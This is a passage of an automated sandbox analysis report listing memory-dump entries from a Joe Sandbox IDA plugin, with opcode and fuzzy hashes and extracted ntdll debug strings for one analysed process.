                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction ID: 0fa1053db18f842c1c4583f19fcb90445563335b2784f70b8d4513a03db820e6
                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction Fuzzy Hash: 79E0C232870A59EFDF322F29DC04F6176E9FF55B50F24486EE186064A487F4AC81CB44
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d280edd2bd3bffe59e700e996024c69ffad8bfce4cb61abe44c53158cd0267d
                                                    • Instruction ID: 26bc4a51d9aded3f5d73dae3698a76b12e2ef4adc3a3feeaa61fd4e0ed59bdb6
                                                    • Opcode Fuzzy Hash: 0d280edd2bd3bffe59e700e996024c69ffad8bfce4cb61abe44c53158cd0267d
                                                    • Instruction Fuzzy Hash: 2BE08C32111490ABC211FA5DDD41EAA739EEBA47A0F440221F15087294CA60AC00C794
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction ID: 2b2d6a009211088c4f6a4cd4a206f595b1c639cad78623c36fc0902c6d2c41bc
                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction Fuzzy Hash: F7D05E36521A50AFC3329F1BEA00C53FBF9FBC4B50705063EE64583924C670E806CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction ID: 4c9bc5135d240f7114f36dc86041f864a728f52099107c4ae48cbc829fc5b349
                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction Fuzzy Hash: 3DD0A932214620ABD772AA1CFC00FD333E8BB88B64F060459F018C7054C360AC82CB84
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction ID: 457a4d6d3c3c15d356ba82fedf4c50b69092f5fd7eef4810fc58302ec7080197
                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction Fuzzy Hash: EEE08C319106809FCF57DF99C640F5ABBB5BB84B40F190054A4085B224C239AC00CB40
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction ID: c1eca4abb4187900dd30b0cb196b26836806aba6f15a3844f6ba4a48cbbb360d
                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction Fuzzy Hash: C1D0223223203193CF2896996800FA36905EB81AD0F0A002C750AA3800C0148C42C2E0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction ID: ccec8a3bd9ede1ab7c9b1eedcdd7cee529f1cb4f93a379ea94a35b0ea037eaf6
                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction Fuzzy Hash: 10D012371E054DBBCB11DFA6DC41FA57BA9E764BA0F444020F514875A0C63AE950D684
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 499abe105a8ae6a16975ae7fc68adef1b42f4f2647f97fa2fd69d2fc46978caf
                                                    • Instruction ID: 3595886e8f08f34834787ea56f10d5fedfa0cf8b4fc8ba6a90ae2bf755e9d72a
                                                    • Opcode Fuzzy Hash: 499abe105a8ae6a16975ae7fc68adef1b42f4f2647f97fa2fd69d2fc46978caf
                                                    • Instruction Fuzzy Hash: B4D0A730561002CBDF1ACF89C511D7E3674FB20740F4000ACE74061024D725FC11C740
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction ID: c9f875f71ed68248fffae107624d9f26cc4d0a0ccaa7cf84e05d5d708206849c
                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction Fuzzy Hash: 02D0C935222E81CFD61BCB1DC5A4B5633F8BB44B88F810490F601CBB62D62CD944CA04
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction ID: eef6b296e81f9fc62e969e5cd55919f698e35ca51f834bc5677896b11a1bcb83
                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction Fuzzy Hash: 68C012322A0648AFC712EA99CD41F527BA9EBA8B80F000021F2048B670C631E820EA84
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction ID: ef8508b2d6eeaf4e1a0ba675197054346fb8d765bb68ee99f3e3907e4c3d66ec
                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction Fuzzy Hash: 20D01236110248EFCB01DF41C890DAA772AFBD8B10F108019FD19076108A31ED63DA50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction ID: b1a2fc724c4b8aeed44ffdece6604b62d3a8f41e3df5b290001e94edaddc981f
                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction Fuzzy Hash: C6C04C757115428FCF16DF19D6D4F5577E4F744740F160890E945CB721E624E801CA10
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2bc9df96bdc25882998de5f54f853a42daf9fb02adc4e56da806b41a2ca9de76
                                                    • Instruction ID: e027987373c5cee49ae6df7d71d5ee2445044f62f8d6f5c1a062250c0425aeb1
                                                    • Opcode Fuzzy Hash: 2bc9df96bdc25882998de5f54f853a42daf9fb02adc4e56da806b41a2ca9de76
                                                    • Instruction Fuzzy Hash: 4A90023161580012954071584884546C005E7E1301F55C025E2424554CCB14CA6A5361
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31ea2d2e3640456be3f69e49bd6a24749aa78d6bde237432104bfe7d1bf098fe
                                                    • Instruction ID: f16ba7291152749d5b09e3a9b2b684e1ac2637385379c31b6dec71414cf96a56
                                                    • Opcode Fuzzy Hash: 31ea2d2e3640456be3f69e49bd6a24749aa78d6bde237432104bfe7d1bf098fe
                                                    • Instruction Fuzzy Hash: 2F90026161150042454071584804406E005E7E2301795C129A2554560CC718C9699369
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8dffe61921fcc926fcc9233afc90fb76e2fac4f62ce3d5960c37dd9cf1f9aae
                                                    • Instruction ID: ff18f04835710d43fce0ff546e060f2851a254aa5793f4c66115a588163c4273
                                                    • Opcode Fuzzy Hash: d8dffe61921fcc926fcc9233afc90fb76e2fac4f62ce3d5960c37dd9cf1f9aae
                                                    • Instruction Fuzzy Hash: 6190023161540802D550715844147468005D7D1301F55C025A2024654DC755CB6977A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab3babb0d8ff400085ec5acb4cec31f443eae514fa049dce62cb157e01310700
                                                    • Instruction ID: 0cd2992e5162986cd96e4fdb9e876c4a7c9b85513868d161c7c0556837b50eef
                                                    • Opcode Fuzzy Hash: ab3babb0d8ff400085ec5acb4cec31f443eae514fa049dce62cb157e01310700
                                                    • Instruction Fuzzy Hash: 9190023121140802D504715848046868005D7D1301F55C025A7024655ED765C9A57231
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87f66c767acee32158001708e24b529fdf9d1f3b79d7c54a1bed7fc0a619d689
                                                    • Instruction ID: f842175cda6c862fcd369807b2bf9128206faf4a0fc5fe2d60c10ab1ae6e056c
                                                    • Opcode Fuzzy Hash: 87f66c767acee32158001708e24b529fdf9d1f3b79d7c54a1bed7fc0a619d689
                                                    • Instruction Fuzzy Hash: E790023121544842D54071584404A468015D7D1305F55C025A2064694DD725CE69B761
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3362d467b04a0e7b008710daf87418c31a9517517693e71234102b0c92a4572b
                                                    • Instruction ID: 35aec620f47816ccde3d6706e76bc520520560e5fba21bc95d43b95dcc58bde5
                                                    • Opcode Fuzzy Hash: 3362d467b04a0e7b008710daf87418c31a9517517693e71234102b0c92a4572b
                                                    • Instruction Fuzzy Hash: 3590023121140802D5807158440464A8005D7D2301F95C029A2025654DCB15CB6D77A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96c2ec16b4db6943f72c71224df1df753efcb4edbc9071bde1e07844680043c3
                                                    • Instruction ID: 4f18102bff423548d23ebf32867bf1560b61201a0d9fd275cc120b8857d19ff9
                                                    • Opcode Fuzzy Hash: 96c2ec16b4db6943f72c71224df1df753efcb4edbc9071bde1e07844680043c3
                                                    • Instruction Fuzzy Hash: 919002A1211540924900B2588404B0AC505D7E1201F55C02AE3054560CC625C9659235
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6776d36ead30d21c3f0ae26a3b86dff98eb8a53ef1780263f3b4ba288037259c
                                                    • Instruction ID: 9d405db88c6bf99f652b617962067cf1aa41fd3c0f41ba938b8efb7f857e059f
                                                    • Opcode Fuzzy Hash: 6776d36ead30d21c3f0ae26a3b86dff98eb8a53ef1780263f3b4ba288037259c
                                                    • Instruction Fuzzy Hash: 92900225231400020545B558060450B8445E7D7351795C029F3416590CC721C9795321
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                                    • Instruction ID: ee242c3f1ad432d0c2b3a55cb651f580d30b9c5f308c690c0513e2cc11ac3a5a
                                                    • Opcode Fuzzy Hash: 9e22667f117e6fba2d81074240f3c76b2f06bc4b3eb7e06f16d8f05c073a31a6
                                                    • Instruction Fuzzy Hash: E65107B6A24157FFCB15DBAC889497EFBFCBB08241B508129E59AD3641D374DE00C7A0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                                    • Instruction ID: c695d77d5f1140e464643f93737d1e6467b323b45bb90a1ec9ee5e0af85612ac
                                                    • Opcode Fuzzy Hash: f8fc6760348b463fab082070bb06eebfd6dcea330ccd86aba1e28e6516aa83e9
                                                    • Instruction Fuzzy Hash: 9B5117B1A00645EEDF74DF6CC890C7FFBF9EB44608B048869E9D6D7642D6B4EA008760
                                                    Strings
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01314725
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013146FC
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01314742
                                                    • ExecuteOptions, xrefs: 013146A0
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01314787
                                                    • Execute=1, xrefs: 01314713
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01314655
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 7937e950abe5c9d86ea959b524c4a9835a92282829127666c52e4b44a8a8dcea
                                                    • Instruction ID: cb475a6a4039c5c2d90dd7faf896ade641e40260fb652534e6b96ce2a4779c3f
                                                    • Opcode Fuzzy Hash: 7937e950abe5c9d86ea959b524c4a9835a92282829127666c52e4b44a8a8dcea
                                                    • Instruction Fuzzy Hash: E151483162021ABEEF24ABA8DC89FBD77BCEF14308F140499E605A71C0E7749A418F90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: 8731ddc7e6da95ef403abd128f49ff14602b051cc4ff94ad2254e1e4ecc59fbb
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: 370256B1508742AFE315CF19C4A4A6FBBE5EFC8708F44892DF9894B260DB35E905CB52
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: be0d711f68c60a374d89dd18ff8646da46627971be59af9c9d5378301038db9f
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 0481E471E6524A8EEF29CF6CC8997FEBBF1AF45310F98411ADA51A7791C7308840CB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                                    • Instruction ID: 7bacea98510de94b0dcc50cb99135b1088c6b9f702dd9304cfb8e9da8f25775b
                                                    • Opcode Fuzzy Hash: 14c94b76cbcf1efd2cbebfcefe1040b671055cf9787ecb542bcc146328fa2a6a
                                                    • Instruction Fuzzy Hash: 24215E7AA10119ABDB50DE79DC44EFFBBF9AF54A44F44012AEE05E3201E7309A018BA5
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013102BD
                                                    • RTL: Re-Waiting, xrefs: 0131031E
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013102E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 889c662738c0a4d708c070e0805c105b48065668fb8a0b8365ce2e18c1b18237
                                                    • Instruction ID: 56c8d5a0929173accf8ab708d4e120cad9f7ad86ed2d67fa281cff7b63383c00
                                                    • Opcode Fuzzy Hash: 889c662738c0a4d708c070e0805c105b48065668fb8a0b8365ce2e18c1b18237
                                                    • Instruction Fuzzy Hash: 23E1CF306247429FD729CF28C985B6ABBE1BB84718F240B2DF6A5CB2D1D774D845CB42
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01317B8E
                                                    • RTL: Re-Waiting, xrefs: 01317BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01317B7F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: b0135b3dde3a0a1a5d9e1b8fefd002da26534e3deb60dd2e0c4dc2bac246a2c6
                                                    • Instruction ID: 66010895f81a04b090c2bae75af1d68ae44bc64d64902f358e86aee65d5158e5
                                                    • Opcode Fuzzy Hash: b0135b3dde3a0a1a5d9e1b8fefd002da26534e3deb60dd2e0c4dc2bac246a2c6
                                                    • Instruction Fuzzy Hash: 904114353107038FDB24DE29C851B6AB7E5FF8A714F100A2DFA96D7280DB71E4058B91
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0131728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 013172A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01317294
                                                    • RTL: Re-Waiting, xrefs: 013172C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 1035bf24abef857f18b6b7f16abc295d16437300100f8cb223f58adc342fee5c
                                                    • Instruction ID: 64219ff3ef8527f66f409224a699964b9f853a96133feaa4fb225c6c81ec5441
                                                    • Opcode Fuzzy Hash: 1035bf24abef857f18b6b7f16abc295d16437300100f8cb223f58adc342fee5c
                                                    • Instruction Fuzzy Hash: F7412335710203ABD725DE29CC41FA6B7A5FF99718F240619F955EB280DB30E80387D1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                                    • Instruction ID: da3b79ca172b7486aaf8d05af2a83eebbfd8c85fa4a210bae7a1d58921d90654
                                                    • Opcode Fuzzy Hash: fc58e02a3b8cce13921b3189860f46df7346d2bb31d26814c0530e968bc03816
                                                    • Instruction Fuzzy Hash: EF314572A10119DFDB60DE2DDC40FAFB7F8BB54614F444559ED49E3241EB309A498BA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 77a1e674fa0943d14e9422c9bc2371c5dc01d83dc98f6e90bb844e6383376f8e
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 3B91C671E202079BEF24DF6DC8996BEBBE5FF44320F98451AEA55E72C0E77089408791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 876c969385bc9f51c435170f5342c2e4af17e3f7354496c9c903b4b320ae3986
